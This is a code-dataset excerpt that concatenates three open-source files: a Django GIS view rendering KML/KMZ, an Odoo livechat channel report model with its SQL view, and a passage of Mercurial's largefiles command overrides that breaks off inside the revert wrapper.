def kml(request, label, model, field_name=None, compress=False, using=DEFAULT_DB_ALIAS):
    """
    This view generates KML for the given app label, model, and field name.

    The model's default manager must be GeoManager, and the field name
    must be that of a geographic field.

    Raises Http404 when the model cannot be resolved or ``field_name`` is not
    a geographic field. When ``compress`` is True, renders KMZ instead.
    """
    placemarks = []
    klass = get_model(label, model)
    if not klass:
        raise Http404('You must supply a valid app label and module name. Got "%s.%s"' % (label, model))
    if field_name:
        try:
            info = klass._meta.get_field_by_name(field_name)
            if not isinstance(info[0], GeometryField):
                raise Exception
        except Exception:
            # Covers both "no such field" and "not a geometry field". Was a
            # bare ``except:``, which also swallowed SystemExit and
            # KeyboardInterrupt; narrowed to Exception.
            raise Http404('Invalid geometry field.')
    connection = connections[using]
    if connection.ops.postgis:
        # PostGIS will take care of transformation.
        placemarks = klass._default_manager.using(using).kml(field_name=field_name)
    else:
        # There's no KML method on Oracle or MySQL, so we use the `kml`
        # attribute of the lazy geometry instead.
        placemarks = []
        if connection.ops.oracle:
            qs = klass._default_manager.using(using).transform(4326, field_name=field_name)
        else:
            qs = klass._default_manager.using(using).all()
        for mod in qs:
            mod.kml = getattr(mod, field_name).kml
            placemarks.append(mod)
    # Pick the (optionally compressing) render function.
    if compress:
        render = render_to_kmz
    else:
        render = render_to_kml
    return render('gis/kml/placemarks.kml', {'places' : placemarks})
def kmz(request, label, model, field_name=None, using=DEFAULT_DB_ALIAS):
    """
    This view returns KMZ for the given app label, model, and field name.

    Thin wrapper around :func:`kml` with compression enabled.
    """
    return kml(request, label, model, field_name, compress=True, using=using)
| apache-2.0 |
rven/odoo | addons/im_livechat/report/im_livechat_report_channel.py | 4 | 6358 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models, tools
class ImLivechatReportChannel(models.Model):
    """ Livechat Support Report on the Channels.

    Read-only reporting model backed by the SQL view created in init():
    one row per livechat conversation with timing, volume and rating
    aggregates.
    """
    _name = "im_livechat.report.channel"
    _description = "Livechat Support Channel Report"
    _order = 'start_date, technical_name'
    _auto = False  # no table is created; init() provides the SQL view

    uuid = fields.Char('UUID', readonly=True)
    channel_id = fields.Many2one('mail.channel', 'Conversation', readonly=True)
    channel_name = fields.Char('Channel Name', readonly=True)
    technical_name = fields.Char('Code', readonly=True)
    livechat_channel_id = fields.Many2one('im_livechat.channel', 'Channel', readonly=True)
    start_date = fields.Datetime('Start Date of session', readonly=True, help="Start date of the conversation")
    start_hour = fields.Char('Start Hour of session', readonly=True, help="Start hour of the conversation")
    day_number = fields.Char('Day Number', readonly=True, help="Day number of the session (1 is Monday, 7 is Sunday)")
    time_to_answer = fields.Float('Time to answer (sec)', digits=(16, 2), readonly=True, group_operator="avg", help="Average time in seconds to give the first answer to the visitor")
    start_date_hour = fields.Char('Hour of start Date of session', readonly=True)
    duration = fields.Float('Average duration', digits=(16, 2), readonly=True, group_operator="avg", help="Duration of the conversation (in seconds)")
    nbr_speaker = fields.Integer('# of speakers', readonly=True, group_operator="avg", help="Number of different speakers")
    nbr_message = fields.Integer('Average message', readonly=True, group_operator="avg", help="Number of message in the conversation")
    is_without_answer = fields.Integer('Session(s) without answer', readonly=True, group_operator="sum",
                                       help="""A session is without answer if the operator did not answer.
                                       If the visitor is also the operator, the session will always be answered.""")
    days_of_activity = fields.Integer('Days of activity', group_operator="max", readonly=True, help="Number of days since the first session of the operator")
    is_anonymous = fields.Integer('Is visitor anonymous', readonly=True)
    country_id = fields.Many2one('res.country', 'Country of the visitor', readonly=True)
    is_happy = fields.Integer('Visitor is Happy', readonly=True)
    rating = fields.Integer('Rating', group_operator="avg", readonly=True)
    # TODO DBE : Use Selection field - Need : Pie chart must show labels, not keys.
    rating_text = fields.Char('Satisfaction Rate', readonly=True)
    is_unrated = fields.Integer('Session not rated', readonly=True)
    partner_id = fields.Many2one('res.partner', 'Operator', readonly=True)

    def init(self):
        # Note : start_date_hour must be remove when the read_group will allow grouping on the hour of a datetime. Don't forget to change the view !
        tools.drop_view_if_exists(self.env.cr, 'im_livechat_report_channel')
        # One row per livechat mail.channel (those with livechat_operator_id
        # set); message joins provide duration, first-answer delay and counts,
        # the rating join provides satisfaction columns.
        self.env.cr.execute("""
            CREATE OR REPLACE VIEW im_livechat_report_channel AS (
                SELECT
                    C.id as id,
                    C.uuid as uuid,
                    C.id as channel_id,
                    C.name as channel_name,
                    CONCAT(L.name, ' / ', C.id) as technical_name,
                    C.livechat_channel_id as livechat_channel_id,
                    C.create_date as start_date,
                    to_char(date_trunc('hour', C.create_date), 'YYYY-MM-DD HH24:MI:SS') as start_date_hour,
                    to_char(date_trunc('hour', C.create_date), 'HH24') as start_hour,
                    extract(dow from  C.create_date) as day_number,
                    EXTRACT('epoch' FROM MAX(M.create_date) - MIN(M.create_date)) AS duration,
                    EXTRACT('epoch' FROM MIN(MO.create_date) - MIN(M.create_date)) AS time_to_answer,
                    count(distinct C.livechat_operator_id) as nbr_speaker,
                    count(distinct M.id) as nbr_message,
                    CASE
                        WHEN EXISTS (select distinct M.author_id FROM mail_message M, mail_message_mail_channel_rel R
                                     WHERE M.author_id=C.livechat_operator_id AND R.mail_channel_id = C.id
                                     AND R.mail_message_id = M.id and C.livechat_operator_id = M.author_id)
                        THEN 0
                        ELSE 1
                    END as is_without_answer,
                    (DATE_PART('day', date_trunc('day', now()) - date_trunc('day', C.create_date)) + 1) as days_of_activity,
                    CASE
                        WHEN C.anonymous_name IS NULL THEN 0
                        ELSE 1
                    END as is_anonymous,
                    C.country_id,
                    CASE
                        WHEN rate.rating = 5 THEN 1
                        ELSE 0
                    END as is_happy,
                    Rate.rating as rating,
                    CASE
                        WHEN Rate.rating = 1 THEN 'Unhappy'
                        WHEN Rate.rating = 5 THEN 'Happy'
                        WHEN Rate.rating = 3 THEN 'Neutral'
                        ELSE null
                    END as rating_text,
                    CASE
                        WHEN rate.rating > 0 THEN 0
                        ELSE 1
                    END as is_unrated,
                    C.livechat_operator_id as partner_id
                FROM mail_channel C
                    JOIN mail_message_mail_channel_rel R ON (C.id = R.mail_channel_id)
                    JOIN mail_message M ON (M.id = R.mail_message_id)
                    JOIN im_livechat_channel L ON (L.id = C.livechat_channel_id)
                    LEFT JOIN mail_message MO ON (R.mail_message_id = MO.id AND MO.author_id = C.livechat_operator_id)
                    LEFT JOIN rating_rating Rate ON (Rate.res_id = C.id and Rate.res_model = 'mail.channel' and Rate.parent_res_model = 'im_livechat.channel')
                WHERE C.livechat_operator_id is not null
                GROUP BY C.livechat_operator_id, C.id, C.name, C.livechat_channel_id, L.name, C.create_date, C.uuid, Rate.rating
            )
        """)
| agpl-3.0 |
ryano144/intellij-community | plugins/hg4idea/testData/bin/hgext/largefiles/overrides.py | 90 | 46667 | # Copyright 2009-2010 Gregory P. Ward
# Copyright 2009-2010 Intelerad Medical Systems Incorporated
# Copyright 2010-2011 Fog Creek Software
# Copyright 2010-2011 Unity Technologies
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
'''Overridden Mercurial commands and functions for the largefiles extension'''
import os
import copy
from mercurial import hg, commands, util, cmdutil, scmutil, match as match_, \
node, archival, error, merge, discovery
from mercurial.i18n import _
from mercurial.node import hex
from hgext import rebase
import lfutil
import lfcommands
import basestore
# -- Utility functions: commonly/repeatedly needed functionality ---------------
def installnormalfilesmatchfn(manifest):
    '''overrides scmutil.match so that the matcher it returns will ignore all
    largefiles'''
    oldmatch = None # for the closure
    def overridematch(ctx, pats=[], opts={}, globbed=False,
            default='relpath'):
        match = oldmatch(ctx, pats, opts, globbed, default)
        m = copy.copy(match)
        # A file is "normal" unless it is itself a standin or its standin
        # is tracked in the given manifest.
        notlfile = lambda f: not (lfutil.isstandin(f) or lfutil.standin(f) in
                manifest)
        m._files = filter(notlfile, m._files)
        m._fmap = set(m._files)
        m._always = False
        origmatchfn = m.matchfn
        # Match only files the wrapped matcher matched that are also
        # normal files (returns None, not False, for non-matches).
        m.matchfn = lambda f: notlfile(f) and origmatchfn(f) or None
        return m
    oldmatch = installmatchfn(overridematch)
def installmatchfn(f):
    """Swap scmutil.match for *f*, remembering the displaced matcher.

    The previous matcher is stashed on *f* as the ``oldmatch`` attribute
    so restorematchfn() can undo the swap; it is also returned.
    """
    previous = scmutil.match
    f.oldmatch = previous
    scmutil.match = f
    return previous
def restorematchfn():
    """Undo one installmatchfn()/installnormalfilesmatchfn() swap.

    Restores the matcher stashed on the current scmutil.match; a no-op
    when scmutil.match is already the original function.  Note that n
    install calls require n restore calls to fully reverse.
    """
    current = scmutil.match
    scmutil.match = getattr(current, 'oldmatch', current)
def addlargefiles(ui, repo, *pats, **opts):
    '''Find files matching *pats* that should become largefiles and
    create/track their standins.

    A file qualifies when --large was given, when it exceeds the
    configured minimum size, or when it matches the configured
    largefiles patterns.  Returns the list of files the underlying
    add reported as bad.
    '''
    large = opts.pop('large', None)
    lfsize = lfutil.getminsize(
        ui, lfutil.islfilesrepo(repo), opts.pop('lfsize', None))
    lfmatcher = None
    if lfutil.islfilesrepo(repo):
        lfpats = ui.configlist(lfutil.longname, 'patterns', default=[])
        if lfpats:
            lfmatcher = match_.match(repo.root, '', list(lfpats))
    lfnames = []
    m = scmutil.match(repo[None], pats, opts)
    # Suppress "file not found" complaints; the normal add reports them.
    m.bad = lambda x, y: None
    wctx = repo[None]
    for f in repo.walk(m):
        exact = m.exact(f)
        lfile = lfutil.standin(f) in wctx
        nfile = f in wctx
        exists = lfile or nfile
        # Don't warn the user when they attempt to add a normal tracked file.
        # The normal add code will do that for us.
        if exact and exists:
            if lfile:
                ui.warn(_('%s already a largefile\n') % f)
            continue
        if (exact or not exists) and not lfutil.isstandin(f):
            wfile = repo.wjoin(f)
            # In case the file was removed previously, but not committed
            # (issue3507)
            if not os.path.exists(wfile):
                continue
            abovemin = (lfsize and
                        os.lstat(wfile).st_size >= lfsize * 1024 * 1024)
            if large or abovemin or (lfmatcher and lfmatcher(f)):
                lfnames.append(f)
                if ui.verbose or not exact:
                    ui.status(_('adding %s as a largefile\n') % m.rel(f))
    bad = []
    standins = []
    # Need to lock, otherwise there could be a race condition between
    # when standins are created and added to the repo.
    wlock = repo.wlock()
    try:
        if not opts.get('dry_run'):
            lfdirstate = lfutil.openlfdirstate(ui, repo)
            for f in lfnames:
                standinname = lfutil.standin(f)
                # Empty hash: the standin is filled in at commit time.
                lfutil.writestandin(repo, standinname, hash='',
                    executable=lfutil.getexecutable(repo.wjoin(f)))
                standins.append(standinname)
                if lfdirstate[f] == 'r':
                    lfdirstate.normallookup(f)
                else:
                    lfdirstate.add(f)
            lfdirstate.write()
            bad += [lfutil.splitstandin(f)
                    for f in repo[None].add(standins)
                    if f in m.files()]
    finally:
        wlock.release()
    return bad
def removelargefiles(ui, repo, *pats, **opts):
    '''Remove largefiles matching *pats* (core of the remove override).

    With --after only already-deleted files are dropped; otherwise
    deleted and clean largefiles are removed while modified/added ones
    produce a warning.  Returns 1 if anything was warned about, else 0.
    '''
    after = opts.get('after')
    if not pats and not after:
        raise util.Abort(_('no files specified'))
    m = scmutil.match(repo[None], pats, opts)
    try:
        repo.lfstatus = True
        s = repo.status(match=m, clean=True)
    finally:
        repo.lfstatus = False
    manifest = repo[None].manifest()
    # Keep only files whose standin is actually tracked.
    modified, added, deleted, clean = [[f for f in list
                                       if lfutil.standin(f) in manifest]
                                      for list in [s[0], s[1], s[3], s[6]]]
    def warn(files, msg):
        # Warn per file; result 1 signals at least one warning.
        for f in files:
            ui.warn(msg % m.rel(f))
        return int(len(files) > 0)
    result = 0
    if after:
        remove, forget = deleted, []
        result = warn(modified + added + clean,
                      _('not removing %s: file still exists\n'))
    else:
        remove, forget = deleted + clean, []
        result = warn(modified, _('not removing %s: file is modified (use -f'
                                  ' to force removal)\n'))
        result = warn(added, _('not removing %s: file has been marked for add'
                               ' (use forget to undo)\n')) or result
    for f in sorted(remove + forget):
        if ui.verbose or not m.exact(f):
            ui.status(_('removing %s\n') % m.rel(f))
    # Need to lock because standin files are deleted then removed from the
    # repository and we could race in-between.
    wlock = repo.wlock()
    try:
        lfdirstate = lfutil.openlfdirstate(ui, repo)
        for f in remove:
            if not after:
                # If this is being called by addremove, notify the user that we
                # are removing the file.
                if getattr(repo, "_isaddremove", False):
                    ui.status(_('removing %s\n') % f)
                util.unlinkpath(repo.wjoin(f), ignoremissing=True)
            lfdirstate.remove(f)
        lfdirstate.write()
        forget = [lfutil.standin(f) for f in forget]
        remove = [lfutil.standin(f) for f in remove]
        repo[None].forget(forget)
        # If this is being called by addremove, let the original addremove
        # function handle this.
        if not getattr(repo, "_isaddremove", False):
            for f in remove:
                util.unlinkpath(repo.wjoin(f), ignoremissing=True)
        repo[None].forget(remove)
    finally:
        wlock.release()
    return result
# For overriding mercurial.hgweb.webcommands so that largefiles will
# appear at their right place in the manifests.
def decodepath(orig, path):
    """Map a standin path back to its largefile name for hgweb display;
    non-standin paths pass through unchanged."""
    lf = lfutil.splitstandin(path)
    return lf if lf else path
# -- Wrappers: modify existing commands --------------------------------
# Add works by going through the files that the user wanted to add and
# checking if they should be added as largefiles. Then it makes a new
# matcher which matches only the normal files and runs the original
# version of add.
def overrideadd(orig, ui, repo, *pats, **opts):
    """Wrap 'hg add': add qualifying files as largefiles first, then run
    the original add against a matcher that only sees normal files.

    With --normal, largefile handling is skipped entirely; combining it
    with --large is rejected.
    """
    if opts.pop('normal'):
        if opts.get('large'):
            raise util.Abort(_('--normal cannot be used with --large'))
        return orig(ui, repo, *pats, **opts)
    bad = addlargefiles(ui, repo, *pats, **opts)
    installnormalfilesmatchfn(repo[None].manifest())
    result = orig(ui, repo, *pats, **opts)
    restorematchfn()
    return 1 if (result == 1 or bad) else 0
def overrideremove(orig, ui, repo, *pats, **opts):
    """Wrap 'hg remove': remove normal files via the original command
    (largefiles masked out of the matcher), then remove the largefiles."""
    installnormalfilesmatchfn(repo[None].manifest())
    normalresult = orig(ui, repo, *pats, **opts)
    restorematchfn()
    lfresult = removelargefiles(ui, repo, *pats, **opts)
    return lfresult or normalresult
def overridestatusfn(orig, repo, rev2, **opts):
    """Run subrepo status with largefile-aware status enabled."""
    repo._repo.lfstatus = True
    try:
        return orig(repo, rev2, **opts)
    finally:
        repo._repo.lfstatus = False
def overridestatus(orig, ui, repo, *pats, **opts):
    """Run 'hg status' with largefile-aware status enabled."""
    repo.lfstatus = True
    try:
        return orig(ui, repo, *pats, **opts)
    finally:
        repo.lfstatus = False
def overridedirty(orig, repo, ignoreupdate=False):
    """Check subrepo dirtiness with largefile-aware status enabled."""
    repo._repo.lfstatus = True
    try:
        return orig(repo, ignoreupdate)
    finally:
        repo._repo.lfstatus = False
def overridelog(orig, ui, repo, *pats, **opts):
    """Wrap 'hg log' so file patterns also match their standins."""
    def overridematch(ctx, pats=[], opts={}, globbed=False,
            default='relpath'):
        """Matcher that merges root directory with .hglf, suitable for log.
        It is still possible to match .hglf directly.
        For any listed files run log on the standin too.
        matchfn tries both the given filename and with .hglf stripped.
        """
        match = oldmatch(ctx, pats, opts, globbed, default)
        m = copy.copy(match)
        standins = [lfutil.standin(f) for f in m._files]
        m._files.extend(standins)
        m._fmap = set(m._files)
        m._always = False
        origmatchfn = m.matchfn
        def lfmatchfn(f):
            # Match if the .hglf-stripped name matches ...
            lf = lfutil.splitstandin(f)
            if lf is not None and origmatchfn(lf):
                return True
            # ... or if the name matches as given.
            r = origmatchfn(f)
            return r
        m.matchfn = lfmatchfn
        return m
    oldmatch = installmatchfn(overridematch)
    try:
        repo.lfstatus = True
        return orig(ui, repo, *pats, **opts)
    finally:
        repo.lfstatus = False
        restorematchfn()
def overrideverify(orig, ui, repo, *pats, **opts):
    """Wrap 'hg verify': optionally verify largefiles too.

    --large turns on largefile verification; the popped lfa/lfc options
    are forwarded to lfcommands.verifylfiles as its all/contents flags.
    """
    large = opts.pop('large', False)
    allrevs = opts.pop('lfa', False)
    contents = opts.pop('lfc', False)
    result = orig(ui, repo, *pats, **opts)
    if large or allrevs or contents:
        if not result:
            result = lfcommands.verifylfiles(ui, repo, allrevs, contents)
    return result
def overridedebugstate(orig, ui, repo, *pats, **opts):
    """Wrap 'hg debugstate': with --large, dump the largefiles dirstate
    instead of the normal one."""
    if opts.pop('large', False):
        lfcommands.debugdirstate(ui, repo)
    else:
        orig(ui, repo, *pats, **opts)
# Override needs to refresh standins so that update's normal merge
# will go through properly. Then the other update hook (overriding repo.update)
# will get the new files. Filemerge is also overridden so that the merge
# will merge standins correctly.
def overrideupdate(orig, ui, repo, *pats, **opts):
    """Wrap 'hg update': refresh standins of changed largefiles first.

    With -c/--check, a modified largefile whose standin is unchanged
    still counts as an uncommitted local change and aborts the update.
    """
    lfdirstate = lfutil.openlfdirstate(ui, repo)
    s = lfdirstate.status(match_.always(repo.root, repo.getcwd()), [], False,
        False, False)
    (unsure, modified, added, removed, missing, unknown, ignored, clean) = s
    # Need to lock between the standins getting updated and their
    # largefiles getting updated
    wlock = repo.wlock()
    try:
        if opts['check']:
            mod = len(modified) > 0
            # 'unsure' entries need a content hash to decide modified/clean.
            for lfile in unsure:
                standin = lfutil.standin(lfile)
                if repo['.'][standin].data().strip() != \
                        lfutil.hashfile(repo.wjoin(lfile)):
                    mod = True
                else:
                    lfdirstate.normal(lfile)
            lfdirstate.write()
            if mod:
                raise util.Abort(_('uncommitted local changes'))
        # XXX handle removed differently
        if not opts['clean']:
            for lfile in unsure + modified + added:
                lfutil.updatestandin(repo, lfutil.standin(lfile))
    finally:
        wlock.release()
    return orig(ui, repo, *pats, **opts)
# Before starting the manifest merge, merge.updates will call
# _checkunknown to check if there are any files in the merged-in
# changeset that collide with unknown files in the working copy.
#
# The largefiles are seen as unknown, so this prevents us from merging
# in a file 'foo' if we already have a largefile with the same name.
#
# The overridden function filters the unknown files by removing any
# largefiles. This makes the merge proceed and we can then handle this
# case further in the overridden manifestmerge function below.
def overridecheckunknownfile(origfn, repo, wctx, mctx, f):
    """Treat a working-copy largefile as known so merges are not blocked.

    If the working context already tracks the standin for *f*, report no
    collision; otherwise defer to the original check.
    """
    standin = lfutil.standin(repo.dirstate.normalize(f))
    if standin in wctx:
        return False
    return origfn(repo, wctx, mctx, f)
# The manifest merge handles conflicts on the manifest level. We want
# to handle changes in largefile-ness of files at this level too.
#
# The strategy is to run the original manifestmerge and then process
# the action list it outputs. There are two cases we need to deal with:
#
# 1. Normal file in p1, largefile in p2. Here the largefile is
# detected via its standin file, which will enter the working copy
# with a "get" action. It is not "merge" since the standin is all
# Mercurial is concerned with at this level -- the link to the
# existing normal file is not relevant here.
#
# 2. Largefile in p1, normal file in p2. Here we get a "merge" action
# since the largefile will be present in the working copy and
# different from the normal file in p2. Mercurial therefore
# triggers a merge action.
#
# In both cases, we prompt the user and emit new actions to either
# remove the standin (if the normal file was kept) or to remove the
# normal file and get the standin (if the largefile was kept). The
# default prompt answer is to use the largefile version since it was
# presumably changed on purpose.
#
# Finally, the merge.applyupdates function will then take care of
# writing the files into the working copy and lfcommands.updatelfiles
# will update the largefiles.
def overridemanifestmerge(origfn, repo, p1, p2, pa, branchmerge, force,
                          partial, acceptremote=False):
    """Post-process manifestmerge's action list to handle files whose
    largefile-ness differs between the two parents (see the comment
    block above for the two cases).  The user is prompted; answer 0
    (the default) keeps the largefile version.
    """
    overwrite = force and not branchmerge
    actions = origfn(repo, p1, p2, pa, branchmerge, force, partial,
                     acceptremote)
    processed = []
    for action in actions:
        if overwrite:
            # Plain overwrite: no conflict handling needed.
            processed.append(action)
            continue
        f, m, args, msg = action
        choices = (_('&Largefile'), _('&Normal file'))
        splitstandin = lfutil.splitstandin(f)
        if (m == "g" and splitstandin is not None and
            splitstandin in p1 and f in p2):
            # Case 1: normal file in the working copy, largefile in
            # the second parent
            lfile = splitstandin
            standin = f
            msg = _('%s has been turned into a largefile\n'
                    'use (l)argefile or keep as (n)ormal file?') % lfile
            if repo.ui.promptchoice(msg, choices, 0) == 0:
                processed.append((lfile, "r", None, msg))
                processed.append((standin, "g", (p2.flags(standin),), msg))
            else:
                processed.append((standin, "r", None, msg))
        elif m == "g" and lfutil.standin(f) in p1 and f in p2:
            # Case 2: largefile in the working copy, normal file in
            # the second parent
            standin = lfutil.standin(f)
            lfile = f
            msg = _('%s has been turned into a normal file\n'
                    'keep as (l)argefile or use (n)ormal file?') % lfile
            if repo.ui.promptchoice(msg, choices, 0) == 0:
                processed.append((lfile, "r", None, msg))
            else:
                processed.append((standin, "r", None, msg))
                processed.append((lfile, "g", (p2.flags(lfile),), msg))
        else:
            processed.append(action)
    return processed
# Override filemerge to prompt the user about how they wish to merge
# largefiles. This will handle identical edits, and copy/rename +
# edit without prompting the user.
def overridefilemerge(origfn, repo, mynode, orig, fcd, fco, fca):
    """Merge standins: resolve identical edits and one-sided changes
    silently, otherwise prompt the user to keep (l)ocal or take (o)ther.
    Non-standins are delegated to the original filemerge.
    """
    # Use better variable names here. Because this is a wrapper we cannot
    # change the variable names in the function declaration.
    fcdest, fcother, fcancestor = fcd, fco, fca
    if not lfutil.isstandin(orig):
        return origfn(repo, mynode, orig, fcdest, fcother, fcancestor)
    else:
        if not fcother.cmp(fcdest): # files identical?
            return None
        # backwards, use working dir parent as ancestor
        if fcancestor == fcother:
            fcancestor = fcdest.parents()[0]
        if orig != fcother.path():
            repo.ui.status(_('merging %s and %s to %s\n')
                           % (lfutil.splitstandin(orig),
                              lfutil.splitstandin(fcother.path()),
                              lfutil.splitstandin(fcdest.path())))
        else:
            repo.ui.status(_('merging %s\n')
                           % lfutil.splitstandin(fcdest.path()))
        # Other side unchanged since the ancestor: keep local.
        if fcancestor.path() != fcother.path() and fcother.data() == \
                fcancestor.data():
            return 0
        # Local side unchanged since the ancestor: take other.
        if fcancestor.path() != fcdest.path() and fcdest.data() == \
                fcancestor.data():
            repo.wwrite(fcdest.path(), fcother.data(), fcother.flags())
            return 0
        if repo.ui.promptchoice(_('largefile %s has a merge conflict\n'
                                'keep (l)ocal or take (o)ther?') %
                                lfutil.splitstandin(orig),
                                (_('&Local'), _('&Other')), 0) == 0:
            return 0
        else:
            repo.wwrite(fcdest.path(), fcother.data(), fcother.flags())
            return 0
# Copy first changes the matchers to match standins instead of
# largefiles. Then it overrides util.copyfile in that function it
# checks if the destination largefile already exists. It also keeps a
# list of copied files so that the largefiles can be copied and the
# dirstate updated.
def overridecopy(orig, ui, repo, pats, opts, rename=False):
    """Wrap 'hg copy'/'hg rename' to copy largefiles via their standins.

    Runs the original command twice: once against normal files only,
    then against the standins, recording copied standins (via a patched
    util.copyfile) so the corresponding largefiles can be copied or
    renamed and the lfdirstate updated to match.
    """
    # doesn't remove largefile on rename
    if len(pats) < 2:
        # this isn't legal, let the original function deal with it
        return orig(ui, repo, pats, opts, rename)
    def makestandin(relpath):
        path = scmutil.canonpath(repo.root, repo.getcwd(), relpath)
        return os.path.join(repo.wjoin(lfutil.standin(path)))
    fullpats = scmutil.expandpats(pats)
    dest = fullpats[-1]
    if os.path.isdir(dest):
        if not os.path.isdir(makestandin(dest)):
            os.makedirs(makestandin(dest))
    # This could copy both lfiles and normal files in one command,
    # but we don't want to do that. First replace their matcher to
    # only match normal files and run it, then replace it to just
    # match largefiles and run it again.
    nonormalfiles = False
    nolfiles = False
    try:
        try:
            installnormalfilesmatchfn(repo[None].manifest())
            result = orig(ui, repo, pats, opts, rename)
        except util.Abort, e:
            # 'no files to copy' only means no *normal* files matched;
            # largefiles may still match in the second pass below.
            if str(e) != _('no files to copy'):
                raise e
            else:
                nonormalfiles = True
            result = 0
    finally:
        restorematchfn()
    # The first rename can cause our current working directory to be removed.
    # In that case there is nothing left to copy/rename so just quit.
    try:
        repo.getcwd()
    except OSError:
        return result
    try:
        try:
            # When we call orig below it creates the standins but we don't add
            # them to the dir state until later so lock during that time.
            wlock = repo.wlock()
            manifest = repo[None].manifest()
            oldmatch = None # for the closure
            def overridematch(ctx, pats=[], opts={}, globbed=False,
                    default='relpath'):
                """Matcher rewritten to target tracked standins only."""
                newpats = []
                # The patterns were previously mangled to add the standin
                # directory; we need to remove that now
                for pat in pats:
                    if match_.patkind(pat) is None and lfutil.shortname in pat:
                        newpats.append(pat.replace(lfutil.shortname, ''))
                    else:
                        newpats.append(pat)
                match = oldmatch(ctx, newpats, opts, globbed, default)
                m = copy.copy(match)
                lfile = lambda f: lfutil.standin(f) in manifest
                m._files = [lfutil.standin(f) for f in m._files if lfile(f)]
                m._fmap = set(m._files)
                m._always = False
                origmatchfn = m.matchfn
                m.matchfn = lambda f: (lfutil.isstandin(f) and
                                    (f in manifest) and
                                    origmatchfn(lfutil.splitstandin(f)) or
                                    None)
                return m
            oldmatch = installmatchfn(overridematch)
            listpats = []
            for pat in pats:
                if match_.patkind(pat) is not None:
                    listpats.append(pat)
                else:
                    listpats.append(makestandin(pat))
            try:
                origcopyfile = util.copyfile
                copiedfiles = []
                def overridecopyfile(src, dest):
                    # Refuse to clobber an existing largefile unless --force;
                    # record every standin copy for the fixup loop below.
                    if (lfutil.shortname in src and
                        dest.startswith(repo.wjoin(lfutil.shortname))):
                        destlfile = dest.replace(lfutil.shortname, '')
                        if not opts['force'] and os.path.exists(destlfile):
                            raise IOError('',
                                _('destination largefile already exists'))
                    copiedfiles.append((src, dest))
                    origcopyfile(src, dest)
                util.copyfile = overridecopyfile
                result += orig(ui, repo, listpats, opts, rename)
            finally:
                util.copyfile = origcopyfile
            lfdirstate = lfutil.openlfdirstate(ui, repo)
            for (src, dest) in copiedfiles:
                if (lfutil.shortname in src and
                    dest.startswith(repo.wjoin(lfutil.shortname))):
                    srclfile = src.replace(repo.wjoin(lfutil.standin('')), '')
                    destlfile = dest.replace(repo.wjoin(lfutil.standin('')), '')
                    destlfiledir = os.path.dirname(repo.wjoin(destlfile)) or '.'
                    if not os.path.isdir(destlfiledir):
                        os.makedirs(destlfiledir)
                    if rename:
                        os.rename(repo.wjoin(srclfile), repo.wjoin(destlfile))
                        lfdirstate.remove(srclfile)
                    else:
                        util.copyfile(repo.wjoin(srclfile),
                                      repo.wjoin(destlfile))
                        lfdirstate.add(destlfile)
            lfdirstate.write()
        except util.Abort, e:
            if str(e) != _('no files to copy'):
                raise e
            else:
                nolfiles = True
    finally:
        restorematchfn()
        wlock.release()
    if nolfiles and nonormalfiles:
        raise util.Abort(_('no files to copy'))
    return result
# When the user calls revert, we have to be careful to not revert any
# changes to other largefiles accidentally. This means we have to keep
# track of the largefiles that are being reverted so we only pull down
# the necessary largefiles.
#
# Standins are only updated (to match the hash of largefiles) before
# commits. Update the standins then run the original revert, changing
# the matcher to hit standins instead of largefiles. Based on the
# resulting standins update the largefiles. Then return the standins
# to their proper state
def overriderevert(orig, ui, repo, *pats, **opts):
    """Wrap 'hg revert' so largefiles are reverted correctly.

    Standins only match their largefiles' hashes at commit time, so they
    are refreshed first, revert runs with a matcher that targets the
    standins (recording which largefiles were touched), the affected
    largefiles are updated from the resulting standins, and the standins
    are finally returned to their previous state.

    Fix: removed a stray bare ``scmutil.match`` expression statement
    (a no-op left over next to the installmatchfn call).
    """
    # Because we put the standins in a bad state (by updating them)
    # and then return them to a correct state we need to lock to
    # prevent others from changing them in their incorrect state.
    wlock = repo.wlock()
    try:
        lfdirstate = lfutil.openlfdirstate(ui, repo)
        (modified, added, removed, missing, unknown, ignored, clean) = \
            lfutil.lfdirstatestatus(lfdirstate, repo, repo['.'].rev())
        lfdirstate.write()
        for lfile in modified:
            lfutil.updatestandin(repo, lfutil.standin(lfile))
        for lfile in missing:
            if (os.path.exists(repo.wjoin(lfutil.standin(lfile)))):
                os.unlink(repo.wjoin(lfutil.standin(lfile)))
        try:
            ctx = scmutil.revsingle(repo, opts.get('rev'))
            oldmatch = None # for the closure
            def overridematch(ctx, pats=[], opts={}, globbed=False,
                    default='relpath'):
                match = oldmatch(ctx, pats, opts, globbed, default)
                m = copy.copy(match)
                def tostandin(f):
                    # Prefer the standin when it exists in either context;
                    # None drops files handled purely as largefiles.
                    if lfutil.standin(f) in ctx:
                        return lfutil.standin(f)
                    elif lfutil.standin(f) in repo[None]:
                        return None
                    return f
                m._files = [tostandin(f) for f in m._files]
                m._files = [f for f in m._files if f is not None]
                m._fmap = set(m._files)
                m._always = False
                origmatchfn = m.matchfn
                def matchfn(f):
                    if lfutil.isstandin(f):
                        # We need to keep track of what largefiles are being
                        # matched so we know which ones to update later --
                        # otherwise we accidentally revert changes to other
                        # largefiles. This is repo-specific, so duckpunch the
                        # repo object to keep the list of largefiles for us
                        # later.
                        if origmatchfn(lfutil.splitstandin(f)) and \
                                (f in repo[None] or f in ctx):
                            lfileslist = getattr(repo, '_lfilestoupdate', [])
                            lfileslist.append(lfutil.splitstandin(f))
                            repo._lfilestoupdate = lfileslist
                            return True
                        else:
                            return False
                    return origmatchfn(f)
                m.matchfn = matchfn
                return m
            oldmatch = installmatchfn(overridematch)
            matches = overridematch(repo[None], pats, opts)
            orig(ui, repo, *pats, **opts)
        finally:
            restorematchfn()
            lfileslist = getattr(repo, '_lfilestoupdate', [])
            lfcommands.updatelfiles(ui, repo, filelist=lfileslist,
                                    printmessage=False)
            # empty out the largefiles list so we start fresh next time
            repo._lfilestoupdate = []
            for lfile in modified:
                if lfile in lfileslist:
                    if os.path.exists(repo.wjoin(lfutil.standin(lfile))) and lfile\
                            in repo['.']:
                        lfutil.writestandin(repo, lfutil.standin(lfile),
                            repo['.'][lfile].data().strip(),
                            'x' in repo['.'][lfile].flags())
            lfdirstate = lfutil.openlfdirstate(ui, repo)
            for lfile in added:
                standin = lfutil.standin(lfile)
                if standin not in ctx and (standin in matches or opts.get('all')):
                    if lfile in lfdirstate:
                        lfdirstate.drop(lfile)
                    util.unlinkpath(repo.wjoin(standin))
